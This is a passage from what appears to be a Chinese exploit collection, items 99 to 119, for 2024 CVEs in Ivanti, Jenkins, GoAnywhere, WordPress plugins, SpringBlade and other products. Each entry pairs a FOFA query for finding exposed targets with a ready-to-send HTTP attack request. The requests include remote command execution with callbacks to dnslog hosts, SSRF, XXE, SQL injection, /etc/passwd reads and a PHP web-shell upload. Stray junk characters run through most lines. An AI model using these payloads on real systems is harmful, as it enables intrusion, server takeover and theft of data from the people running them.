- R ^$ A c1 r( S) L9 A2 }2 HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 d# _0 X! c7 x7 rContent-Type: application/x-www-form-urlencoded; charset=UTF-8
u; D$ X; d8 kX-Requested-With: XMLHttpRequest
9 z" E5 l+ i6 f8 ?, w4 J- u6 U# G8 |. w I; c
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
' w- x4 a. p4 n1 {! S& F- b
: p7 u6 W4 A# n# z1 a9 m7 `0 A; \8 k( d
99. Ncast盈可视高清智能录播系统busiFacade RCE
2 M+ w) N) b" V8 hCVE-2024-0305
" ^( y6 m4 Y$ ?FOFA:app="Ncast-产品" && title=="高清智能录播系统"
3 i% @- h( H9 B# ?POST /classes/common/busiFacade.php HTTP/1.1' N, M! @3 f/ u( J; y/ ]! W$ k, N
Host: 192.168.40.130:8080
* J, z& A& A z5 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: n+ X. k" y1 u0 f7 J0 V9 X& kConnection: close. c# X2 {4 f4 t: B2 d5 P! t
Content-Length: 154# M0 U2 ]/ N% {2 C: L
Accept: */*- J: p8 K! D+ }; o. G) H+ X+ S8 X/ b" z
Accept-Encoding: gzip, deflate/ |. c0 e6 C! l+ |- v f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 {4 E1 E% n! S5 I" G5 {# N
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
! O) C- y' A" {& RX-Requested-With: XMLHttpRequest+ w: D, b( H: X2 f# ~6 Z
! X# p- Z1 L$ F5 H%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D1 I3 ]) `9 D/ m; z. [, ~' O: G. ~
/ V! o e& n3 d& H5 K+ B" p+ g! }
% M" o, t7 d8 B# _8 c$ h/ |; N100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
" D4 r7 l4 e, `CVE-2024-0352- p4 a: ^/ q; G& s M/ @' k+ i
FOFA:icon_hash="874152924"
1 p6 ~9 f7 }$ c. t8 M! A# m0 k6 j8 KPOST /api/file/formimage HTTP/1.1! t" Z: l; B1 t
Host: 192.168.40.130
$ k% k- b" w) r6 b# [# k# ZUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36/ q R( O* ?. A9 h8 c
Connection: close
* r0 G1 r1 q' d" j1 g; j% OContent-Length: 201/ G, H0 m2 D0 q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei; z% V1 E; L$ V! A# G
Accept-Encoding: gzip) p/ y+ n; Y! Q, l) q) N
0 D% G, m3 o6 y7 T( f7 ~
------WebKitFormBoundarygcflwtei
, I$ i/ B* o. \Content-Disposition: form-data; name="file";filename="IE4MGP.php"
- Y6 i% t* r8 zContent-Type: application/x-php
$ w) a# G6 |# ?! X* C8 y k5 R5 i; K2 X$ U
2ayyhRXiAsKXL8olvF5s4qqyI2O/ B2 `( S. o8 v" \
------WebKitFormBoundarygcflwtei--: P% d4 S! a. v: R+ S! V( N
! a4 m! e1 [- |9 I
$ m/ R' S' Q1 t; H7 p. C7 T( E1 ]# b
101. ivanti policy secure-22.6命令注入* `# ~" {! t: M/ O6 E& @" |* I
CVE-2024-218878 p, `* ^4 M; b& r( e
FOFA:body="welcome.cgi?p=logo"5 [' [# g7 Q+ y4 I" C, S
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1: O; A' q8 z e
Host: x.x.x.xx.x.x.x$ L3 u: I% c; K' |7 u3 z' R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 S" U$ V/ s3 r$ C* o
Connection: close) }/ M- t! u8 ^( s( y! ?( \' h: D
Accept-Encoding: gzip* e5 a! M# L9 U! O! K* l
% Q4 V' Y5 ?% T1 y4 n- s" v
' F; w+ z4 M/ m/ O$ V# x# K" W102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
( I; i7 E5 @' j0 y: V% N8 BCVE-2024-21893! l- |/ j2 M* y; C& z9 L. u
FOFA:body="welcome.cgi?p=logo"1 f, p8 a! k3 a: y
POST /dana-ws/saml20.ws HTTP/1.1
% J+ O, B% v0 h6 t3 J$ n" dHost: x.x.x.x
8 o; V- _# }4 v# W) D0 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ t- X3 u! i, w" C" AConnection: close
$ I: L# G: R" Q7 z: K- qContent-Length: 7922 Q" X$ ]! c7 v# k
Accept-Encoding: gzip+ q# H) g8 A0 m, j E
I% `! d" }; T' a* {
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>3 q3 V. |9 n g4 O1 y/ S
5 F" M0 v/ z9 d7 C$ N
103. Ivanti Pulse Connect Secure VPN XXE
- S0 ^, Y# _3 {CVE-2024-22024
2 B2 c3 J7 A' oFOFA:body="welcome.cgi?p=logo"
1 ^% x" Z7 i$ F9 `, W' Z9 s8 _; B7 ]POST /dana-na/auth/saml-sso.cgi HTTP/1.1
7 x" [, k3 t4 bHost: 192.168.40.130:111
& v$ J( ]7 i- l6 \User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.368 J9 c2 X& p6 L! {' n5 T
Connection: close
, o6 J0 b% M# t3 b1 c1 xContent-Length: 204
, E9 G2 i! R9 A( E$ A" |: O( gContent-Type: application/x-www-form-urlencoded( O, I$ ?" u/ Y8 i
Accept-Encoding: gzip
# i; b% H1 k: w7 R X7 W3 m& }$ ~3 p( I9 W& V
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==; B) D1 _5 l$ I3 v) ]% c, `
# [. Q% K5 Q' w% j" t9 S- z0 b/ a" P+ m x9 d8 o; [
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
T8 t. E% Y5 V2 [# V9 w& S ^+ C<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
! J% G- _3 t. ^, Y2 h# e1 ?" u% K- |( Z2 |$ Y* W% x$ p/ Y
' k" P V* A3 p* N104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
- |8 h! `& m/ c2 {) k: Y+ E6 FCVE-2024-0569
/ F$ |, r' [7 M. rFOFA:title="TOTOLINK"
& K. u2 i" n3 e3 U$ l9 ~7 |POST /cgi-bin/cstecgi.cgi HTTP/1.1
2 ]2 o3 i, L* |/ S+ |Host:192.168.0.1
- j" D0 M" X5 k, } L3 |Content-Length:416 ?9 Y' j7 f4 G5 u8 Z: i
Accept:application/json,text/javascript,*/*;q=0.016 |* K; O! K3 O4 G* }7 i I
X-Requested-with: XMLHttpRequest
* J7 u4 ?) M. l- k+ L9 lUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36. `9 a8 }5 b2 q( E0 Z' j( u$ @
Content-Type: application/x-www-form-urlencoded:charset=UTF-8, X3 Z! {% l, C
Origin: http://192.168.0.1" ~1 R& q3 r0 ]9 g. ?: J
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
$ a5 h2 h0 H$ L5 Z# MAccept-Encoding:gzip,deflate
/ @4 z9 f* v' p9 r; j# M: zAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7& j- h+ I8 |6 x4 {: R
Connection:close4 h/ _ b( o$ R! I0 I5 Y4 I& ~+ K- W& B
9 v: U( b m2 ~5 K: H! c" _4 }9 M. O{" S3 a9 Q" T6 i% ]5 J$ z
"topicurl":"getSysStatusCfg",
$ F2 S( \7 |# W$ k, }"token":""4 L( n5 j2 d9 J8 _! Y, n
}/ N/ g0 W/ J- {+ ^8 {
0 i, ^. f9 p& e! v) t+ G
105. SpringBlade v3.2.0 export-user SQL 注入) j; g; A2 S: U
FOFA:body="https://bladex.vip"
/ \/ R! y$ O( A6 F. zhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
8 ]2 i: `5 u4 O; e+ l2 Z& b1 q* z" z+ W8 q- @% ^
106. SpringBlade dict-biz/list SQL 注入
6 k$ D0 h6 Y/ d$ e0 b! JFOFA:body="Saber 将不能正常工作"5 X; F8 _. o. m+ u4 a' C- M
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
% {( u& @" N; ] |5 {9 P+ R3 L6 jHost: your-ip
# w* n4 ^% S& b4 i: TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 K1 V0 `8 {9 c) m+ T# U
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A: h$ \& m0 z* z6 m6 j; y9 Q- X, }
Accept-Encoding: gzip, deflate
9 H7 K8 Q. K, N* @: |Accept-Language: zh-CN,zh;q=0.9
9 \! O6 r/ W1 A) ]6 r/ ZConnection: close6 D- B. z1 K/ t1 C2 T
( t3 u1 e6 g- a# g
$ Z; s4 V4 b! J7 z( |+ W7 ~9 z4 o107. SpringBlade tenant/list SQL 注入8 a1 c4 Q I0 f" m# s& O4 I: E& l( o
FOFA:body="https://bladex.vip"
) X+ A1 K0 q2 V B8 t5 BGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1 M+ ]7 L# m j5 i! O
Host: your-ip
* m8 x; m6 D( ]. l3 q* fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# k- i; J% s% q+ R+ \) qBlade-Auth:替换为自己的/ {) q; o$ h; a. J
Connection: close
7 O3 M" t1 A; F( F f& ]
5 |: G8 `0 y8 x! m8 ^( a
8 v5 h- X/ P% d9 f108. D-Tale 3.9.0 SSRF
7 B, I& X2 ?- H6 xCVE-2024-21642
# Y$ ~! A# `" E0 g8 _FOFA:"dtale/static/images/favicon.png"% p4 Y. [& ~( [* T/ w
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1, j+ _+ ^; \- ]
Host: your-ip
/ N/ @" _3 L1 {0 T$ @5 HAccept: application/json, text/plain, */* y* b- j' M1 H k w' C2 J7 r8 T; ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. e" W0 a" L& W& F2 v
Accept-Encoding: gzip, deflate
% K) S* q1 ^7 I8 a iAccept-Language: zh-CN,zh;q=0.9,en;q=0.88 Y) ]/ U2 C2 d0 h# E6 R" i! k
Connection: close
) a( c! k8 E0 V& G4 l* V% W: S) J4 ]' l# [
$ G* h$ _! G( g; k
109. Jenkins CLI 任意文件读取3 I, L" x7 r [; {
CVE-2024-23897
3 A- c. i9 k. O( ^# q% @5 L0 v v7 MFOFA:header="X-Jenkins"
0 I5 c- h- P1 D7 `! X$ X) L }- lPOST /cli?remoting=false HTTP/1.1' c# c: M! b! T# v% K( f) [
Host:
. s. }3 Z3 S3 }: RContent-type: application/octet-stream
9 V3 X5 ?, b2 J9 q5 ASession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
0 j# v; Z; j# t1 g. r5 F2 e( ISide: upload
- p2 p$ c5 ?( P/ O" Q, V$ w& CConnection: keep-alive% S! c$ i$ P" Y" o
Content-Length: 163
) f/ m+ [3 W7 e& r4 ~, ?4 z& U7 b" A2 y4 x% k3 Y9 ~$ O" w- g
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'- p$ B1 Q, K, x$ P
4 d( }: K& b# o) `- R
. p) A( u$ D8 x" E# p8 W2 p( wPOST /cli?remoting=false HTTP/1.19 T- E( c0 w: r9 Q* C
Host:& M) W1 R: b# K+ U7 C
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
$ t% Y6 k( d# u( [download
( r1 T2 c( O$ r% G% w2 S2 S! f/ a) kContent-Type: application/x-www-form-urlencoded
, H+ @8 q+ F. L! P8 N0 t x% CContent-Length: 0
7 c4 ?. t& ~4 l' U/ J
" K( a/ d6 S0 n! P1 I0 ^* R& j! Z1 k
. b+ ~, Z8 ` VERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin$ z9 O# N. |! N. Z5 `! V8 X, C) n( l
java -jar jenkins-cli.jar help
; }4 Y. h& A& T5 I! X% z4 F[COMMAND]' z$ l% r' J9 t) R, a4 D. f2 g; s% r3 Y: c
Lists all the available commands or a detailed description of single command.7 s9 @ {$ I. ?# { I
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)% O. v8 X+ p- u& @$ o# S* V
3 E. L% d* S( U5 {, W& r& z% L8 ]' O4 j) \! c3 _0 }+ i& X
110. Goanywhere MFT 未授权创建管理员
1 F `4 ^3 u% h' X3 lCVE-2024-0204- Z9 V; b7 J, ^. e% u
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
' P- H. u) Q6 |) z- l) HGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
* c2 J: d @# Q3 ]. q uHost: 192.168.40.130:8000
/ {6 u9 j# L+ K/ oUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
0 ?' A4 | l3 t* ], mConnection: close
1 D( e$ n* o: ]Accept: */*% L8 y" {7 n/ e& e5 I, G Q0 a
Accept-Language: en8 L* ~" I+ N, P% f5 c6 n+ G' a( D
Accept-Encoding: gzip% _: z5 C4 [) B8 }) F; e
) `/ m0 r# \- ^: H5 [
" C( U; d" B. F7 `
111. WordPress Plugin HTML5 Video Player SQL注入
4 B' w( b) M2 A0 }$ eCVE-2024-1061
) u; x8 D1 `/ W0 c6 C- e) fFOFA:"wordpress" && body="html5-video-player"( E) ?9 ~( Q7 G7 Q
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
2 A* z: s( W6 m6 l# s' dHost: 192.168.40.130:1121 W; B& d! M6 B! G# W# U, I
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' z" h2 B! e# z' tConnection: close
% w' J( W: j- t" n4 q* ?Accept: */*+ q8 l. {* {/ {# f* T1 ~
Accept-Language: en/ b% V2 p* A* y) Q4 A% P: v
Accept-Encoding: gzip
7 N9 h# W# v& w/ L6 B' C1 T5 ~ @
+ e/ e( c! w1 Z, V. j6 T- e( Y112. WordPress Plugin NotificationX SQL 注入" n6 Z/ v1 u3 b9 U$ `1 P& Q
CVE-2024-1698
/ c7 P: y3 e$ |# }& v4 C: e Q BFOFA:body="/wp-content/plugins/notificationx") a2 G6 }/ ?- E( W- s: c: b! u
POST /wp-json/notificationx/v1/analytics HTTP/1.1
, _- E9 u1 m) S6 UHost: {{Hostname}}/ z" X2 z2 K9 s, [% }% d
Content-Type: application/json! h N8 f$ P' c5 T+ q' D; K
- I, n, h$ @5 d+ Y3 r! P6 Q- M{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
8 Q3 l: m, n! s# R0 \7 e" e4 K- N+ v% f$ B+ x+ z9 _
5 d6 j. I* |# J8 ^* Q113. WordPress Automatic 插件任意文件下载和SSRF! {7 j' b. h7 i, @' J8 ]
CVE-2024-27954
1 u. S. E% a; h, n% W+ T8 f: m6 X! |FOFA:"/wp-content/plugins/wp-automatic"* R2 t' g1 f7 j' K1 N+ M5 ^, T+ K3 B
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1& y( R6 g) g# D! b: J
Host: x.x.x.x! i. ^* f* L v+ R3 J3 l1 R
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
0 d m: m: `% V7 C, G2 p, cConnection: close
! \+ V: d. L0 ~Accept: */*
4 _( `2 g5 Y+ p9 q5 mAccept-Language: en
, J4 C9 E6 S9 j- ?Accept-Encoding: gzip
1 x' D) c* `$ e/ o5 m, N2 t7 C* ?# P' Q* r
+ F5 d8 d2 c/ B! {3 H) p* N
114. WordPress MasterStudy LMS插件 SQL注入
) I) y3 k( |) Y' g6 b4 F, V3 |8 ]FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"( ]/ C! x) |8 e# F. H8 e- H
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
) l! m- |1 A2 }% n9 M1 lHost: your-ip7 L R A6 A! {1 d% w% q- T& v
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
3 ~. @. `0 W' m; sAccept-Charset: utf-8' z1 }6 E# [" H* x; P' p7 G
Accept-Encoding: gzip, deflate+ w J6 W }2 O4 W. M5 D- H
Connection: close7 E$ {( y: q" P. z
+ R; m) W G$ M* q: V/ O1 D
; {; ]) x1 ]- X* {0 \9 i- a5 e6 `
115. WordPress Bricks Builder <= 1.9.6 RCE6 b2 r& B. E* X: q4 C' g6 T6 O
CVE-2024-25600
# x5 \9 v# h: ?" j% }$ R3 v& R5 xFOFA: body="/wp-content/themes/bricks/"( \' n4 W4 y' L
第一步,获取网站的nonce值, x9 K8 s$ Z. q" r- `5 K2 ?
GET / HTTP/1.1
# D5 U0 F9 U- s4 G6 E( [Host: x.x.x.x
4 a' y+ ^9 N( k* ^& EUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36; j! I& x% K. C- c2 q
Connection: close3 c2 j" u7 g% F+ L
Accept-Encoding: gzip h' F7 ^' \1 y* L
8 a, [& b6 {6 A. U, x
2 r1 P" G/ }4 f+ N9 F4 Y6 ~' g第二步替换nonce值,执行命令0 K8 m7 \7 n% _ k- y
POST /wp-json/bricks/v1/render_element HTTP/1.10 \+ R' j% v$ f' D
Host: x.x.x.x1 c2 A2 `* M. `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
0 v4 ^1 a! K( H8 ?# Z |. MConnection: close$ ^9 ` E, |2 [' Q
Content-Length: 356
" }$ ^7 E& j0 J. q$ r* TContent-Type: application/json7 V" @/ q+ R: U# K+ l) r* P
Accept-Encoding: gzip' {8 s; S; e t+ R
6 s6 i5 ]" V% V% I( o
{
% _9 A; x& O% N"postId": "1",; i1 L! Y8 G/ K6 F1 S6 S
"nonce": "第一步获得的值",
4 J* v, j, A" A" q5 C. g "element": {* u6 z* v! A$ P1 F1 u4 Z
"name": "container",1 g9 |# c8 w8 N& G7 n! }$ d
"settings": {
! m7 k, z; n% B9 f! d* G "hasLoop": "true",
" w2 P* ^8 Z$ ]/ A "query": {
% B8 R( y$ H6 e# t2 B "useQueryEditor": true,) k1 w% t! E% f2 A" ]
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
0 j7 H7 ^* ~* ^6 d$ g "objectType": "post"
1 T1 c- `: {4 n }& b$ B, j1 [7 b9 C8 P
}+ d/ `0 M! f/ l( N
} K) R0 U# D0 e. r
}" M# ?6 u. Y4 \% J% x* D
# f1 T2 l2 F7 O* M6 p
0 q L! c3 ]' i# l5 O) [116. wordpress js-support-ticket文件上传
, b' V% a8 `( ^4 {FOFA:body="wp-content/plugins/js-support-ticket"
/ e* `: {% K6 j. rPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
" s' {2 p- ?, r( f/ @3 s, \Host:
1 v' w" Y6 {$ y) jContent-Type: multipart/form-data; boundary=--------767099171
2 e/ m& x& ?: R' y& nUser-Agent: Mozilla/5.0
0 \. E Y& L- M$ w6 [1 b! z2 o3 E* ]
----------767099171
& o& c+ I3 a A; A% v7 M6 v3 `, YContent-Disposition: form-data; name="action"% [! f0 G# T9 S: W, I" G. q
configuration_saveconfiguration
2 Q a% U V7 L- V i----------767099171
3 D# n ?) o) D; g0 wContent-Disposition: form-data; name="form_request"
m8 B/ @) o' c' {6 n+ Djssupportticket
0 R9 L1 S0 `& r1 H& l----------767099171
7 T* V4 [' o# _& ]7 q* `9 QContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"# Z8 J3 w8 e# n; a7 p8 ^
Content-Type: image/png9 {8 x; P. z& w
----------767099171--
' G6 t. a" j, w6 I) s0 N8 h3 c+ n8 T1 x' W$ h& K7 n' w
: A' i% t+ } z+ F3 w117. WordPress LayerSlider插件SQL注入% _$ x; u1 M' f
version:7.9.11 – 7.10.0
4 R" O+ C3 V6 c8 R4 GFOFA:body="/wp-content/plugins/LayerSlider/"2 P. H& v9 @$ Y' {- u6 t
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
4 i+ _ _3 p7 \Host: your-ip
6 i' q S! _: n+ @* Y" C# jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 T5 q! \- K! x& nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Y G; C: t+ T1 e+ IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: y+ i0 J1 G# G- Z6 e; A" RAccept-Encoding: gzip, deflate, br7 f! c/ Y6 h( S, \. N
Connection: close
+ |' _6 p7 v4 h' M3 _; oUpgrade-Insecure-Requests: 1* W1 V; Y b- l* s
' e7 u U. ]/ L4 n$ ^) X) V9 g& K+ p$ X- Q5 J# e/ h0 n
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传' K& C% f; `6 i6 p2 E9 P
CVE-2024-0939. X! |8 E& D' J v& d! u
FOFA:title="Smart管理平台"
" f" }$ \3 k3 n1 g; F5 ^6 ^POST /Tool/uploadfile.php? HTTP/1.1
- D: S6 S$ J4 Y, y/ [/ BHost: 192.168.40.130:8443
* v! h7 O. D! tCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
* i$ z4 u7 a0 B/ K( OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0% ]$ g' X; Z" {/ J+ f% j- Y& U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 a, k" `( f% u4 [5 |0 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# B( I2 a E7 l4 xAccept-Encoding: gzip, deflate0 m/ }* ]/ G( l$ m; G
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887( T0 S" q7 W& [! O- d+ `
Content-Length: 405! g+ e: D/ D. G3 }" H
Origin: https://192.168.40.130:8443
3 G6 [! J$ ?- m, K0 GReferer: https://192.168.40.130:8443/Tool/uploadfile.php
6 n8 Z: {8 ^) e- e' EUpgrade-Insecure-Requests: 1
5 B1 g, ~/ S- DSec-Fetch-Dest: document
! Q9 _( J$ Q# c& C0 @Sec-Fetch-Mode: navigate
* {9 g8 g6 R/ L8 O' j" k( j- ^Sec-Fetch-Site: same-origin
( j; ~7 b0 J; V0 x9 NSec-Fetch-User: ?1
# u, [& P& U& d. c, _. y3 dTe: trailers
; x V, ^, ]/ }2 q3 Y: L8 hConnection: close# Q6 S+ N( J( B) [2 P) k
8 \2 }7 \5 t' n. N# C1 z: C-----------------------------13979701222747646634037182887) E n% S8 F; x8 X0 b& Y
Content-Disposition: form-data; name="file_upload"; filename="contents.php"; h( T% T4 O! Q! _
Content-Type: application/octet-stream0 q8 v+ d* Q+ w
0 k1 T$ m# q# O" g! c$ Q/ J<?php3 y4 A% f7 m/ R2 T7 b- L
system($_POST["passwd"]);3 Q. v5 ]3 n* ?( q/ [; d
?>
0 r* ?7 l! I3 ?2 `: [! T-----------------------------13979701222747646634037182887/ r7 ]5 P6 w3 g- P
Content-Disposition: form-data; name="txt_path": X8 u! l; R0 n R, I
& M+ P) X0 k4 p) M* h$ u/home/src.php2 e( M1 `1 _8 D# L& V0 m o
-----------------------------13979701222747646634037182887-- s2 k8 T& S" t8 J" x
: f' K G/ T ^9 m+ B
0 O/ R$ ?$ ~$ E$ k- r" E# x9 V8 b访问/home/src.php
* C: t$ Z4 s! Z0 G! k
* k) X9 k( D$ m; p2 p( Z119. 北京百绰智能S20后台sysmanageajax.php sql注入
3 v; g" l! F$ R: m( ACVE-2024-1254
7 Z# A5 f/ W* Z1 VFOFA:title="Smart管理平台"8 C* I {" q4 L: _6 j4 C
先登录进入系统,默认账号密码为admin/admin$ R8 B' \. h+ D" D$ a5 q7 c
POST /sysmanage/sysmanageajax.php HTTP/1.11
9 {; u/ b4 v0 j/ LHost: x.x.x.x$ ^* Q. d. h8 @7 @! B1 h
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
* o' y {$ }% R: J4 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0. o4 ~4 V! d8 u5 u! ?
Accept: */*
* `$ d* A7 x: r) r; G NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 p2 W2 Y8 u! a2 }+ l r9 @) K
Accept-Encoding: gzip, deflate
7 q# g+ G6 ~; D. U4 zContent-Type: application/x-www-form-urlencoded;: V3 L: p/ |" R1 Q; U+ F$ P5 a4 g, G
Content-Length: 109
6 ]5 L' C5 `8 y! g0 `, jOrigin: https://58.18.133.60:8443, ~; g6 U5 c: s/ ?' V- M
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
( S' H6 o2 t4 pSec-Fetch-Dest: empty
: O% O$ K7 {. M+ U W; BSec-Fetch-Mode: cors
! ~3 z4 k3 `( p. ]- B6 y0 y* GSec-Fetch-Site: same-origin
# c4 @* Z4 t4 x' @X-Forwarded-For: 1.1.1.1
v* r5 N% X+ g) lX-Originating-Ip: 1.1.1.1) `. p b& Z; o; m
X-Remote-Ip: 1.1.1.1
